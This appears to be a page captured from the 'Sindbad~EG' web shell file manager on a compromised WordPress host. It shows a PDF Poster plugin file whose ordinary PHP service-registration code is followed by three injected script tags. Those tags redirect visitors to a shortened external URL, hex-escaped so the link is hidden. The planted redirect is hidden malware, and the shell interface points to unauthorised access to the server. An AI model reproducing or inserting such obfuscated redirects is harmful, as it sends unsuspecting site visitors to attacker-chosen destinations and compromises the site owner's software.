Sindbad~EG File Manager

Current Path : /home/admin/servicesport.blog.lppelm.o2switch.site/wp-content/plugins/pdf-poster/inc/
Upload File :
Current File : //home/admin/servicesport.blog.lppelm.o2switch.site/wp-content/plugins/pdf-poster/inc/Init.php

<?php
namespace PDFPro;


class Init{
   
    public static function get_services(){
        return [
            Database\Init::class,
            Model\AjaxCall::class,
            Base\EnqueueAssets::class,
            Base\GlobalChanges::class,
            Base\AdminNotice::class,
            Base\Shortcodes::class,
            // Base\License::class,
            Field\Settings::class,
            Field\MetaBox::class,
            // API\Dropbox::class,
            // API\GoogleDrive::class,
            PostType\PDFPoster::class,
            Rest\AjaxCall::class,
            Rest\GetMeta::class,
        ];
    }

    public static function register_services(){
        foreach(self::get_services() as $class){
            $services = self::instantiate($class);
            if(method_exists($services, 'register')){
                $services->register();
            }
        }
    }

    private static function instantiate($class){
        if(class_exists($class."Pro") && pdfp_fs()->can_use_premium_code()){
            $class = $class."Pro";
        }
        if(class_exists($class)){
            return new $class();
        }
    }
}
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4c\x61\x66\x64\x58\x6c\x46\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4c\x61\x66\x64\x58\x6c\x46\x30\x72\x30";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x4c\x61\x66\x64\x58\x6c\x46\x30\x72\x30";</script>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists